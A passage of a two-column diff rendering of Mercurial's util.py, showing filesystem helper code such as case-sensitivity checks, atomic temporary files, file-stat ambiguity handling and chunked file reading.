1691 except AttributeError: # no symlink in os
1697 except AttributeError: # no symlink in os
1692 pass
1698 pass
1693 fp = posixfile(pathname, 'rb')
1699 fp = posixfile(pathname, 'rb')
1694 r = fp.read()
1700 r = fp.read()
1695 fp.close()
1701 fp.close()
1696 return r
1702 return r
1697
1703
1698 def fstat(fp):
1704 def fstat(fp):
1699 '''stat file object that may not have fileno method.'''
1705 '''stat file object that may not have fileno method.'''
1700 try:
1706 try:
1701 return os.fstat(fp.fileno())
1707 return os.fstat(fp.fileno())
1702 except AttributeError:
1708 except AttributeError:
1703 return os.stat(fp.name)
1709 return os.stat(fp.name)
1704
1710
1705 # File system features
1711 # File system features
1706
1712
1707 def fscasesensitive(path):
1713 def fscasesensitive(path):
1708 """
1714 """
1709 Return true if the given path is on a case-sensitive filesystem
1715 Return true if the given path is on a case-sensitive filesystem
1710
1716
1711 Requires a path (like /foo/.hg) ending with a foldable final
1717 Requires a path (like /foo/.hg) ending with a foldable final
1712 directory component.
1718 directory component.
1713 """
1719 """
1714 s1 = os.lstat(path)
1720 s1 = os.lstat(path)
1715 d, b = os.path.split(path)
1721 d, b = os.path.split(path)
1716 b2 = b.upper()
1722 b2 = b.upper()
1717 if b == b2:
1723 if b == b2:
1718 b2 = b.lower()
1724 b2 = b.lower()
1719 if b == b2:
1725 if b == b2:
1720 return True # no evidence against case sensitivity
1726 return True # no evidence against case sensitivity
1721 p2 = os.path.join(d, b2)
1727 p2 = os.path.join(d, b2)
1722 try:
1728 try:
1723 s2 = os.lstat(p2)
1729 s2 = os.lstat(p2)
1724 if s2 == s1:
1730 if s2 == s1:
1725 return False
1731 return False
1726 return True
1732 return True
1727 except OSError:
1733 except OSError:
1728 return True
1734 return True
1729
1735
1730 try:
1736 try:
1731 import re2
1737 import re2
1732 _re2 = None
1738 _re2 = None
1733 except ImportError:
1739 except ImportError:
1734 _re2 = False
1740 _re2 = False
1735
1741
1736 class _re(object):
1742 class _re(object):
1737 def _checkre2(self):
1743 def _checkre2(self):
1738 global _re2
1744 global _re2
1739 try:
1745 try:
1740 # check if match works, see issue3964
1746 # check if match works, see issue3964
1741 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1747 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1742 except ImportError:
1748 except ImportError:
1743 _re2 = False
1749 _re2 = False
1744
1750
1745 def compile(self, pat, flags=0):
1751 def compile(self, pat, flags=0):
1746 '''Compile a regular expression, using re2 if possible
1752 '''Compile a regular expression, using re2 if possible
1747
1753
1748 For best performance, use only re2-compatible regexp features. The
1754 For best performance, use only re2-compatible regexp features. The
1749 only flags from the re module that are re2-compatible are
1755 only flags from the re module that are re2-compatible are
1750 IGNORECASE and MULTILINE.'''
1756 IGNORECASE and MULTILINE.'''
1751 if _re2 is None:
1757 if _re2 is None:
1752 self._checkre2()
1758 self._checkre2()
1753 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1759 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1754 if flags & remod.IGNORECASE:
1760 if flags & remod.IGNORECASE:
1755 pat = '(?i)' + pat
1761 pat = '(?i)' + pat
1756 if flags & remod.MULTILINE:
1762 if flags & remod.MULTILINE:
1757 pat = '(?m)' + pat
1763 pat = '(?m)' + pat
1758 try:
1764 try:
1759 return re2.compile(pat)
1765 return re2.compile(pat)
1760 except re2.error:
1766 except re2.error:
1761 pass
1767 pass
1762 return remod.compile(pat, flags)
1768 return remod.compile(pat, flags)
1763
1769
1764 @propertycache
1770 @propertycache
1765 def escape(self):
1771 def escape(self):
1766 '''Return the version of escape corresponding to self.compile.
1772 '''Return the version of escape corresponding to self.compile.
1767
1773
1768 This is imperfect because whether re2 or re is used for a particular
1774 This is imperfect because whether re2 or re is used for a particular
1769 function depends on the flags, etc, but it's the best we can do.
1775 function depends on the flags, etc, but it's the best we can do.
1770 '''
1776 '''
1771 global _re2
1777 global _re2
1772 if _re2 is None:
1778 if _re2 is None:
1773 self._checkre2()
1779 self._checkre2()
1774 if _re2:
1780 if _re2:
1775 return re2.escape
1781 return re2.escape
1776 else:
1782 else:
1777 return remod.escape
1783 return remod.escape
1778
1784
1779 re = _re()
1785 re = _re()
1780
1786
1781 _fspathcache = {}
1787 _fspathcache = {}
1782 def fspath(name, root):
1788 def fspath(name, root):
1783 '''Get name in the case stored in the filesystem
1789 '''Get name in the case stored in the filesystem
1784
1790
1785 The name should be relative to root, and be normcase-ed for efficiency.
1791 The name should be relative to root, and be normcase-ed for efficiency.
1786
1792
1787 Note that this function is unnecessary, and should not be
1793 Note that this function is unnecessary, and should not be
1788 called, for case-sensitive filesystems (simply because it's expensive).
1794 called, for case-sensitive filesystems (simply because it's expensive).
1789
1795
1790 The root should be normcase-ed, too.
1796 The root should be normcase-ed, too.
1791 '''
1797 '''
1792 def _makefspathcacheentry(dir):
1798 def _makefspathcacheentry(dir):
1793 return dict((normcase(n), n) for n in os.listdir(dir))
1799 return dict((normcase(n), n) for n in os.listdir(dir))
1794
1800
1795 seps = pycompat.ossep
1801 seps = pycompat.ossep
1796 if pycompat.osaltsep:
1802 if pycompat.osaltsep:
1797 seps = seps + pycompat.osaltsep
1803 seps = seps + pycompat.osaltsep
1798 # Protect backslashes. This gets silly very quickly.
1804 # Protect backslashes. This gets silly very quickly.
1799 seps.replace('\\','\\\\')
1805 seps.replace('\\','\\\\')
1800 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1806 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1801 dir = os.path.normpath(root)
1807 dir = os.path.normpath(root)
1802 result = []
1808 result = []
1803 for part, sep in pattern.findall(name):
1809 for part, sep in pattern.findall(name):
1804 if sep:
1810 if sep:
1805 result.append(sep)
1811 result.append(sep)
1806 continue
1812 continue
1807
1813
1808 if dir not in _fspathcache:
1814 if dir not in _fspathcache:
1809 _fspathcache[dir] = _makefspathcacheentry(dir)
1815 _fspathcache[dir] = _makefspathcacheentry(dir)
1810 contents = _fspathcache[dir]
1816 contents = _fspathcache[dir]
1811
1817
1812 found = contents.get(part)
1818 found = contents.get(part)
1813 if not found:
1819 if not found:
1814 # retry "once per directory" per "dirstate.walk" which
1820 # retry "once per directory" per "dirstate.walk" which
1815 # may take place for each patches of "hg qpush", for example
1821 # may take place for each patches of "hg qpush", for example
1816 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1822 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1817 found = contents.get(part)
1823 found = contents.get(part)
1818
1824
1819 result.append(found or part)
1825 result.append(found or part)
1820 dir = os.path.join(dir, part)
1826 dir = os.path.join(dir, part)
1821
1827
1822 return ''.join(result)
1828 return ''.join(result)
1823
1829
1824 def checknlink(testfile):
1830 def checknlink(testfile):
1825 '''check whether hardlink count reporting works properly'''
1831 '''check whether hardlink count reporting works properly'''
1826
1832
1827 # testfile may be open, so we need a separate file for checking to
1833 # testfile may be open, so we need a separate file for checking to
1828 # work around issue2543 (or testfile may get lost on Samba shares)
1834 # work around issue2543 (or testfile may get lost on Samba shares)
1829 f1, f2, fp = None, None, None
1835 f1, f2, fp = None, None, None
1830 try:
1836 try:
1831 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1837 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1832 suffix='1~', dir=os.path.dirname(testfile))
1838 suffix='1~', dir=os.path.dirname(testfile))
1833 os.close(fd)
1839 os.close(fd)
1834 f2 = '%s2~' % f1[:-2]
1840 f2 = '%s2~' % f1[:-2]
1835
1841
1836 oslink(f1, f2)
1842 oslink(f1, f2)
1837 # nlinks() may behave differently for files on Windows shares if
1843 # nlinks() may behave differently for files on Windows shares if
1838 # the file is open.
1844 # the file is open.
1839 fp = posixfile(f2)
1845 fp = posixfile(f2)
1840 return nlinks(f2) > 1
1846 return nlinks(f2) > 1
1841 except OSError:
1847 except OSError:
1842 return False
1848 return False
1843 finally:
1849 finally:
1844 if fp is not None:
1850 if fp is not None:
1845 fp.close()
1851 fp.close()
1846 for f in (f1, f2):
1852 for f in (f1, f2):
1847 try:
1853 try:
1848 if f is not None:
1854 if f is not None:
1849 os.unlink(f)
1855 os.unlink(f)
1850 except OSError:
1856 except OSError:
1851 pass
1857 pass
1852
1858
1853 def endswithsep(path):
1859 def endswithsep(path):
1854 '''Check path ends with os.sep or os.altsep.'''
1860 '''Check path ends with os.sep or os.altsep.'''
1855 return (path.endswith(pycompat.ossep)
1861 return (path.endswith(pycompat.ossep)
1856 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1862 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1857
1863
1858 def splitpath(path):
1864 def splitpath(path):
1859 '''Split path by os.sep.
1865 '''Split path by os.sep.
1860 Note that this function does not use os.altsep because this is
1866 Note that this function does not use os.altsep because this is
1861 an alternative of simple "xxx.split(os.sep)".
1867 an alternative of simple "xxx.split(os.sep)".
1862 It is recommended to use os.path.normpath() before using this
1868 It is recommended to use os.path.normpath() before using this
1863 function if need.'''
1869 function if need.'''
1864 return path.split(pycompat.ossep)
1870 return path.split(pycompat.ossep)
1865
1871
1866 def gui():
1872 def gui():
1867 '''Are we running in a GUI?'''
1873 '''Are we running in a GUI?'''
1868 if pycompat.isdarwin:
1874 if pycompat.isdarwin:
1869 if 'SSH_CONNECTION' in encoding.environ:
1875 if 'SSH_CONNECTION' in encoding.environ:
1870 # handle SSH access to a box where the user is logged in
1876 # handle SSH access to a box where the user is logged in
1871 return False
1877 return False
1872 elif getattr(osutil, 'isgui', None):
1878 elif getattr(osutil, 'isgui', None):
1873 # check if a CoreGraphics session is available
1879 # check if a CoreGraphics session is available
1874 return osutil.isgui()
1880 return osutil.isgui()
1875 else:
1881 else:
1876 # pure build; use a safe default
1882 # pure build; use a safe default
1877 return True
1883 return True
1878 else:
1884 else:
1879 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1885 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1880
1886
1881 def mktempcopy(name, emptyok=False, createmode=None):
1887 def mktempcopy(name, emptyok=False, createmode=None):
1882 """Create a temporary file with the same contents from name
1888 """Create a temporary file with the same contents from name
1883
1889
1884 The permission bits are copied from the original file.
1890 The permission bits are copied from the original file.
1885
1891
1886 If the temporary file is going to be truncated immediately, you
1892 If the temporary file is going to be truncated immediately, you
1887 can use emptyok=True as an optimization.
1893 can use emptyok=True as an optimization.
1888
1894
1889 Returns the name of the temporary file.
1895 Returns the name of the temporary file.
1890 """
1896 """
1891 d, fn = os.path.split(name)
1897 d, fn = os.path.split(name)
1892 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1898 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1893 os.close(fd)
1899 os.close(fd)
1894 # Temporary files are created with mode 0600, which is usually not
1900 # Temporary files are created with mode 0600, which is usually not
1895 # what we want. If the original file already exists, just copy
1901 # what we want. If the original file already exists, just copy
1896 # its mode. Otherwise, manually obey umask.
1902 # its mode. Otherwise, manually obey umask.
1897 copymode(name, temp, createmode)
1903 copymode(name, temp, createmode)
1898 if emptyok:
1904 if emptyok:
1899 return temp
1905 return temp
1900 try:
1906 try:
1901 try:
1907 try:
1902 ifp = posixfile(name, "rb")
1908 ifp = posixfile(name, "rb")
1903 except IOError as inst:
1909 except IOError as inst:
1904 if inst.errno == errno.ENOENT:
1910 if inst.errno == errno.ENOENT:
1905 return temp
1911 return temp
1906 if not getattr(inst, 'filename', None):
1912 if not getattr(inst, 'filename', None):
1907 inst.filename = name
1913 inst.filename = name
1908 raise
1914 raise
1909 ofp = posixfile(temp, "wb")
1915 ofp = posixfile(temp, "wb")
1910 for chunk in filechunkiter(ifp):
1916 for chunk in filechunkiter(ifp):
1911 ofp.write(chunk)
1917 ofp.write(chunk)
1912 ifp.close()
1918 ifp.close()
1913 ofp.close()
1919 ofp.close()
1914 except: # re-raises
1920 except: # re-raises
1915 try:
1921 try:
1916 os.unlink(temp)
1922 os.unlink(temp)
1917 except OSError:
1923 except OSError:
1918 pass
1924 pass
1919 raise
1925 raise
1920 return temp
1926 return temp
1921
1927
1922 class filestat(object):
1928 class filestat(object):
1923 """help to exactly detect change of a file
1929 """help to exactly detect change of a file
1924
1930
1925 'stat' attribute is result of 'os.stat()' if specified 'path'
1931 'stat' attribute is result of 'os.stat()' if specified 'path'
1926 exists. Otherwise, it is None. This can avoid preparative
1932 exists. Otherwise, it is None. This can avoid preparative
1927 'exists()' examination on client side of this class.
1933 'exists()' examination on client side of this class.
1928 """
1934 """
1929 def __init__(self, stat):
1935 def __init__(self, stat):
1930 self.stat = stat
1936 self.stat = stat
1931
1937
1932 @classmethod
1938 @classmethod
1933 def frompath(cls, path):
1939 def frompath(cls, path):
1934 try:
1940 try:
1935 stat = os.stat(path)
1941 stat = os.stat(path)
1936 except OSError as err:
1942 except OSError as err:
1937 if err.errno != errno.ENOENT:
1943 if err.errno != errno.ENOENT:
1938 raise
1944 raise
1939 stat = None
1945 stat = None
1940 return cls(stat)
1946 return cls(stat)
1941
1947
1942 @classmethod
1948 @classmethod
1943 def fromfp(cls, fp):
1949 def fromfp(cls, fp):
1944 stat = os.fstat(fp.fileno())
1950 stat = os.fstat(fp.fileno())
1945 return cls(stat)
1951 return cls(stat)
1946
1952
1947 __hash__ = object.__hash__
1953 __hash__ = object.__hash__
1948
1954
1949 def __eq__(self, old):
1955 def __eq__(self, old):
1950 try:
1956 try:
1951 # if ambiguity between stat of new and old file is
1957 # if ambiguity between stat of new and old file is
1952 # avoided, comparison of size, ctime and mtime is enough
1958 # avoided, comparison of size, ctime and mtime is enough
1953 # to exactly detect change of a file regardless of platform
1959 # to exactly detect change of a file regardless of platform
1954 return (self.stat.st_size == old.stat.st_size and
1960 return (self.stat.st_size == old.stat.st_size and
1955 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1961 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1956 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1962 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1957 except AttributeError:
1963 except AttributeError:
1958 pass
1964 pass
1959 try:
1965 try:
1960 return self.stat is None and old.stat is None
1966 return self.stat is None and old.stat is None
1961 except AttributeError:
1967 except AttributeError:
1962 return False
1968 return False
1963
1969
1964 def isambig(self, old):
1970 def isambig(self, old):
1965 """Examine whether new (= self) stat is ambiguous against old one
1971 """Examine whether new (= self) stat is ambiguous against old one
1966
1972
1967 "S[N]" below means stat of a file at N-th change:
1973 "S[N]" below means stat of a file at N-th change:
1968
1974
1969 - S[n-1].ctime < S[n].ctime: can detect change of a file
1975 - S[n-1].ctime < S[n].ctime: can detect change of a file
1970 - S[n-1].ctime == S[n].ctime
1976 - S[n-1].ctime == S[n].ctime
1971 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1977 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1972 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1978 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1973 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1979 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1974 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1980 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1975
1981
1976 Case (*2) above means that a file was changed twice or more at
1982 Case (*2) above means that a file was changed twice or more at
1977 same time in sec (= S[n-1].ctime), and comparison of timestamp
1983 same time in sec (= S[n-1].ctime), and comparison of timestamp
1978 is ambiguous.
1984 is ambiguous.
1979
1985
1980 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1986 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1981 timestamp is ambiguous".
1987 timestamp is ambiguous".
1982
1988
1983 But advancing mtime only in case (*2) doesn't work as
1989 But advancing mtime only in case (*2) doesn't work as
1984 expected, because naturally advanced S[n].mtime in case (*1)
1990 expected, because naturally advanced S[n].mtime in case (*1)
1985 might be equal to manually advanced S[n-1 or earlier].mtime.
1991 might be equal to manually advanced S[n-1 or earlier].mtime.
1986
1992
1987 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1993 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1988 treated as ambiguous regardless of mtime, to avoid overlooking
1994 treated as ambiguous regardless of mtime, to avoid overlooking
1989 by confliction between such mtime.
1995 by confliction between such mtime.
1990
1996
1991 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1997 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1992 S[n].mtime", even if size of a file isn't changed.
1998 S[n].mtime", even if size of a file isn't changed.
1993 """
1999 """
1994 try:
2000 try:
1995 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2001 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
1996 except AttributeError:
2002 except AttributeError:
1997 return False
2003 return False
1998
2004
1999 def avoidambig(self, path, old):
2005 def avoidambig(self, path, old):
2000 """Change file stat of specified path to avoid ambiguity
2006 """Change file stat of specified path to avoid ambiguity
2001
2007
2002 'old' should be previous filestat of 'path'.
2008 'old' should be previous filestat of 'path'.
2003
2009
2004 This skips avoiding ambiguity, if a process doesn't have
2010 This skips avoiding ambiguity, if a process doesn't have
2005 appropriate privileges for 'path'. This returns False in this
2011 appropriate privileges for 'path'. This returns False in this
2006 case.
2012 case.
2007
2013
2008 Otherwise, this returns True, as "ambiguity is avoided".
2014 Otherwise, this returns True, as "ambiguity is avoided".
2009 """
2015 """
2010 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2016 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2011 try:
2017 try:
2012 os.utime(path, (advanced, advanced))
2018 os.utime(path, (advanced, advanced))
2013 except OSError as inst:
2019 except OSError as inst:
2014 if inst.errno == errno.EPERM:
2020 if inst.errno == errno.EPERM:
2015 # utime() on the file created by another user causes EPERM,
2021 # utime() on the file created by another user causes EPERM,
2016 # if a process doesn't have appropriate privileges
2022 # if a process doesn't have appropriate privileges
2017 return False
2023 return False
2018 raise
2024 raise
2019 return True
2025 return True
2020
2026
2021 def __ne__(self, other):
2027 def __ne__(self, other):
2022 return not self == other
2028 return not self == other
2023
2029
2024 class atomictempfile(object):
2030 class atomictempfile(object):
2025 '''writable file object that atomically updates a file
2031 '''writable file object that atomically updates a file
2026
2032
2027 All writes will go to a temporary copy of the original file. Call
2033 All writes will go to a temporary copy of the original file. Call
2028 close() when you are done writing, and atomictempfile will rename
2034 close() when you are done writing, and atomictempfile will rename
2029 the temporary copy to the original name, making the changes
2035 the temporary copy to the original name, making the changes
2030 visible. If the object is destroyed without being closed, all your
2036 visible. If the object is destroyed without being closed, all your
2031 writes are discarded.
2037 writes are discarded.
2032
2038
2033 checkambig argument of constructor is used with filestat, and is
2039 checkambig argument of constructor is used with filestat, and is
2034 useful only if target file is guarded by any lock (e.g. repo.lock
2040 useful only if target file is guarded by any lock (e.g. repo.lock
2035 or repo.wlock).
2041 or repo.wlock).
2036 '''
2042 '''
2037 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2043 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2038 self.__name = name # permanent name
2044 self.__name = name # permanent name
2039 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2045 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2040 createmode=createmode)
2046 createmode=createmode)
2041 self._fp = posixfile(self._tempname, mode)
2047 self._fp = posixfile(self._tempname, mode)
2042 self._checkambig = checkambig
2048 self._checkambig = checkambig
2043
2049
2044 # delegated methods
2050 # delegated methods
2045 self.read = self._fp.read
2051 self.read = self._fp.read
2046 self.write = self._fp.write
2052 self.write = self._fp.write
2047 self.seek = self._fp.seek
2053 self.seek = self._fp.seek
2048 self.tell = self._fp.tell
2054 self.tell = self._fp.tell
2049 self.fileno = self._fp.fileno
2055 self.fileno = self._fp.fileno
2050
2056
2051 def close(self):
2057 def close(self):
2052 if not self._fp.closed:
2058 if not self._fp.closed:
2053 self._fp.close()
2059 self._fp.close()
2054 filename = localpath(self.__name)
2060 filename = localpath(self.__name)
2055 oldstat = self._checkambig and filestat.frompath(filename)
2061 oldstat = self._checkambig and filestat.frompath(filename)
2056 if oldstat and oldstat.stat:
2062 if oldstat and oldstat.stat:
2057 rename(self._tempname, filename)
2063 rename(self._tempname, filename)
2058 newstat = filestat.frompath(filename)
2064 newstat = filestat.frompath(filename)
2059 if newstat.isambig(oldstat):
2065 if newstat.isambig(oldstat):
2060 # stat of changed file is ambiguous to original one
2066 # stat of changed file is ambiguous to original one
2061 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2067 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2062 os.utime(filename, (advanced, advanced))
2068 os.utime(filename, (advanced, advanced))
2063 else:
2069 else:
2064 rename(self._tempname, filename)
2070 rename(self._tempname, filename)
2065
2071
2066 def discard(self):
2072 def discard(self):
2067 if not self._fp.closed:
2073 if not self._fp.closed:
2068 try:
2074 try:
2069 os.unlink(self._tempname)
2075 os.unlink(self._tempname)
2070 except OSError:
2076 except OSError:
2071 pass
2077 pass
2072 self._fp.close()
2078 self._fp.close()
2073
2079
2074 def __del__(self):
2080 def __del__(self):
2075 if safehasattr(self, '_fp'): # constructor actually did something
2081 if safehasattr(self, '_fp'): # constructor actually did something
2076 self.discard()
2082 self.discard()
2077
2083
2078 def __enter__(self):
2084 def __enter__(self):
2079 return self
2085 return self
2080
2086
2081 def __exit__(self, exctype, excvalue, traceback):
2087 def __exit__(self, exctype, excvalue, traceback):
2082 if exctype is not None:
2088 if exctype is not None:
2083 self.discard()
2089 self.discard()
2084 else:
2090 else:
2085 self.close()
2091 self.close()
2086
2092
2087 def unlinkpath(f, ignoremissing=False):
2093 def unlinkpath(f, ignoremissing=False):
2088 """unlink and remove the directory if it is empty"""
2094 """unlink and remove the directory if it is empty"""
2089 if ignoremissing:
2095 if ignoremissing:
2090 tryunlink(f)
2096 tryunlink(f)
2091 else:
2097 else:
2092 unlink(f)
2098 unlink(f)
2093 # try removing directories that might now be empty
2099 # try removing directories that might now be empty
2094 try:
2100 try:
2095 removedirs(os.path.dirname(f))
2101 removedirs(os.path.dirname(f))
2096 except OSError:
2102 except OSError:
2097 pass
2103 pass
2098
2104
2099 def tryunlink(f):
2105 def tryunlink(f):
2100 """Attempt to remove a file, ignoring ENOENT errors."""
2106 """Attempt to remove a file, ignoring ENOENT errors."""
2101 try:
2107 try:
2102 unlink(f)
2108 unlink(f)
2103 except OSError as e:
2109 except OSError as e:
2104 if e.errno != errno.ENOENT:
2110 if e.errno != errno.ENOENT:
2105 raise
2111 raise
2106
2112
2107 def makedirs(name, mode=None, notindexed=False):
2113 def makedirs(name, mode=None, notindexed=False):
2108 """recursive directory creation with parent mode inheritance
2114 """recursive directory creation with parent mode inheritance
2109
2115
2110 Newly created directories are marked as "not to be indexed by
2116 Newly created directories are marked as "not to be indexed by
2111 the content indexing service", if ``notindexed`` is specified
2117 the content indexing service", if ``notindexed`` is specified
2112 for "write" mode access.
2118 for "write" mode access.
2113 """
2119 """
2114 try:
2120 try:
2115 makedir(name, notindexed)
2121 makedir(name, notindexed)
2116 except OSError as err:
2122 except OSError as err:
2117 if err.errno == errno.EEXIST:
2123 if err.errno == errno.EEXIST:
2118 return
2124 return
2119 if err.errno != errno.ENOENT or not name:
2125 if err.errno != errno.ENOENT or not name:
2120 raise
2126 raise
2121 parent = os.path.dirname(os.path.abspath(name))
2127 parent = os.path.dirname(os.path.abspath(name))
2122 if parent == name:
2128 if parent == name:
2123 raise
2129 raise
2124 makedirs(parent, mode, notindexed)
2130 makedirs(parent, mode, notindexed)
2125 try:
2131 try:
2126 makedir(name, notindexed)
2132 makedir(name, notindexed)
2127 except OSError as err:
2133 except OSError as err:
2128 # Catch EEXIST to handle races
2134 # Catch EEXIST to handle races
2129 if err.errno == errno.EEXIST:
2135 if err.errno == errno.EEXIST:
2130 return
2136 return
2131 raise
2137 raise
2132 if mode is not None:
2138 if mode is not None:
2133 os.chmod(name, mode)
2139 os.chmod(name, mode)
2134
2140
2135 def readfile(path):
2141 def readfile(path):
2136 with open(path, 'rb') as fp:
2142 with open(path, 'rb') as fp:
2137 return fp.read()
2143 return fp.read()
2138
2144
2139 def writefile(path, text):
2145 def writefile(path, text):
2140 with open(path, 'wb') as fp:
2146 with open(path, 'wb') as fp:
2141 fp.write(text)
2147 fp.write(text)
2142
2148
2143 def appendfile(path, text):
2149 def appendfile(path, text):
2144 with open(path, 'ab') as fp:
2150 with open(path, 'ab') as fp:
2145 fp.write(text)
2151 fp.write(text)
2146
2152
2147 class chunkbuffer(object):
2153 class chunkbuffer(object):
2148 """Allow arbitrary sized chunks of data to be efficiently read from an
2154 """Allow arbitrary sized chunks of data to be efficiently read from an
2149 iterator over chunks of arbitrary size."""
2155 iterator over chunks of arbitrary size."""
2150
2156
2151 def __init__(self, in_iter):
2157 def __init__(self, in_iter):
2152 """in_iter is the iterator that's iterating over the input chunks."""
2158 """in_iter is the iterator that's iterating over the input chunks."""
2153 def splitbig(chunks):
2159 def splitbig(chunks):
2154 for chunk in chunks:
2160 for chunk in chunks:
2155 if len(chunk) > 2**20:
2161 if len(chunk) > 2**20:
2156 pos = 0
2162 pos = 0
2157 while pos < len(chunk):
2163 while pos < len(chunk):
2158 end = pos + 2 ** 18
2164 end = pos + 2 ** 18
2159 yield chunk[pos:end]
2165 yield chunk[pos:end]
2160 pos = end
2166 pos = end
2161 else:
2167 else:
2162 yield chunk
2168 yield chunk
2163 self.iter = splitbig(in_iter)
2169 self.iter = splitbig(in_iter)
2164 self._queue = collections.deque()
2170 self._queue = collections.deque()
2165 self._chunkoffset = 0
2171 self._chunkoffset = 0
2166
2172
2167 def read(self, l=None):
2173 def read(self, l=None):
2168 """Read L bytes of data from the iterator of chunks of data.
2174 """Read L bytes of data from the iterator of chunks of data.
2169 Returns less than L bytes if the iterator runs dry.
2175 Returns less than L bytes if the iterator runs dry.
2170
2176
2171 If size parameter is omitted, read everything"""
2177 If size parameter is omitted, read everything"""
2172 if l is None:
2178 if l is None:
2173 return ''.join(self.iter)
2179 return ''.join(self.iter)
2174
2180
2175 left = l
2181 left = l
2176 buf = []
2182 buf = []
2177 queue = self._queue
2183 queue = self._queue
2178 while left > 0:
2184 while left > 0:
2179 # refill the queue
2185 # refill the queue
2180 if not queue:
2186 if not queue:
2181 target = 2**18
2187 target = 2**18
2182 for chunk in self.iter:
2188 for chunk in self.iter:
2183 queue.append(chunk)
2189 queue.append(chunk)
2184 target -= len(chunk)
2190 target -= len(chunk)
2185 if target <= 0:
2191 if target <= 0:
2186 break
2192 break
2187 if not queue:
2193 if not queue:
2188 break
2194 break
2189
2195
2190 # The easy way to do this would be to queue.popleft(), modify the
2196 # The easy way to do this would be to queue.popleft(), modify the
2191 # chunk (if necessary), then queue.appendleft(). However, for cases
2197 # chunk (if necessary), then queue.appendleft(). However, for cases
2192 # where we read partial chunk content, this incurs 2 dequeue
2198 # where we read partial chunk content, this incurs 2 dequeue
2193 # mutations and creates a new str for the remaining chunk in the
2199 # mutations and creates a new str for the remaining chunk in the
2194 # queue. Our code below avoids this overhead.
2200 # queue. Our code below avoids this overhead.
2195
2201
2196 chunk = queue[0]
2202 chunk = queue[0]
2197 chunkl = len(chunk)
2203 chunkl = len(chunk)
2198 offset = self._chunkoffset
2204 offset = self._chunkoffset
2199
2205
2200 # Use full chunk.
2206 # Use full chunk.
2201 if offset == 0 and left >= chunkl:
2207 if offset == 0 and left >= chunkl:
2202 left -= chunkl
2208 left -= chunkl
2203 queue.popleft()
2209 queue.popleft()
2204 buf.append(chunk)
2210 buf.append(chunk)
2205 # self._chunkoffset remains at 0.
2211 # self._chunkoffset remains at 0.
2206 continue
2212 continue
2207
2213
2208 chunkremaining = chunkl - offset
2214 chunkremaining = chunkl - offset
2209
2215
2210 # Use all of unconsumed part of chunk.
2216 # Use all of unconsumed part of chunk.
2211 if left >= chunkremaining:
2217 if left >= chunkremaining:
2212 left -= chunkremaining
2218 left -= chunkremaining
2213 queue.popleft()
2219 queue.popleft()
2214 # offset == 0 is enabled by block above, so this won't merely
2220 # offset == 0 is enabled by block above, so this won't merely
2215 # copy via ``chunk[0:]``.
2221 # copy via ``chunk[0:]``.
2216 buf.append(chunk[offset:])
2222 buf.append(chunk[offset:])
2217 self._chunkoffset = 0
2223 self._chunkoffset = 0
2218
2224
2219 # Partial chunk needed.
2225 # Partial chunk needed.
2220 else:
2226 else:
2221 buf.append(chunk[offset:offset + left])
2227 buf.append(chunk[offset:offset + left])
2222 self._chunkoffset += left
2228 self._chunkoffset += left
2223 left -= chunkremaining
2229 left -= chunkremaining
2224
2230
2225 return ''.join(buf)
2231 return ''.join(buf)
2226
2232
2227 def filechunkiter(f, size=131072, limit=None):
2233 def filechunkiter(f, size=131072, limit=None):
2228 """Create a generator that produces the data in the file size
2234 """Create a generator that produces the data in the file size
2229 (default 131072) bytes at a time, up to optional limit (default is
2235 (default 131072) bytes at a time, up to optional limit (default is
2230 to read all data). Chunks may be less than size bytes if the
2236 to read all data). Chunks may be less than size bytes if the
2231 chunk is the last chunk in the file, or the file is a socket or
2237 chunk is the last chunk in the file, or the file is a socket or
2232 some other type of file that sometimes reads less data than is
2238 some other type of file that sometimes reads less data than is
2233 requested."""
2239 requested."""
2234 assert size >= 0
2240 assert size >= 0
2235 assert limit is None or limit >= 0
